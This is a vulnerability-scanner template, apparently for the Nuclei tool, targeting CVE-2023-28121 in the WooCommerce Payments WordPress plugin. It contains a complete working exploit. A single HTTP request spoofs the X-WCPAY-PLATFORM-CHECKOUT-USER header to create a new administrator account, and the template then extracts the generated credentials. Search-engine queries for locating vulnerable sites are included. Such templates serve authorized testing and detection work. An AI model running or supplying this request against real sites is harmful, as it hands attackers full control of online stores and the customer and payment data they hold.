id: CVE-2023-28121 info: name: WooCommerce Payments - Unauthorized Admin Access author: DhiyaneshDK severity: critical description: | An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated. reference: - https://github.com/gbrsh/CVE-2023-28121 - https://nvd.nist.gov/vuln/detail/CVE-2023-28121 - https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/ - https://woocommerce.com/products/woocommerce-payments/ - https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-28121 cwe-id: CWE-287 epss-score: 0.72766 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: true google-query: inurl:/wp-content/plugins/woocommerce-payments publicwww-query: /wp-content/plugins/woocommerce-payments vendor: automattic product: woocommerce_payments framework: wordpress tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" email: "{{randstr}}@{{rand_base(5)}}.com" http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} X-WCPAY-PLATFORM-CHECKOUT-USER: 1 Content-Type: application/x-www-form-urlencoded rest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator matchers-condition: and matchers: - type: word part: body words: - '"registered_date":' - '"username":' - '"email":' condition: and - type: word part: header words: - application/json - type: status status: - 201 extractors: - type: dsl dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password'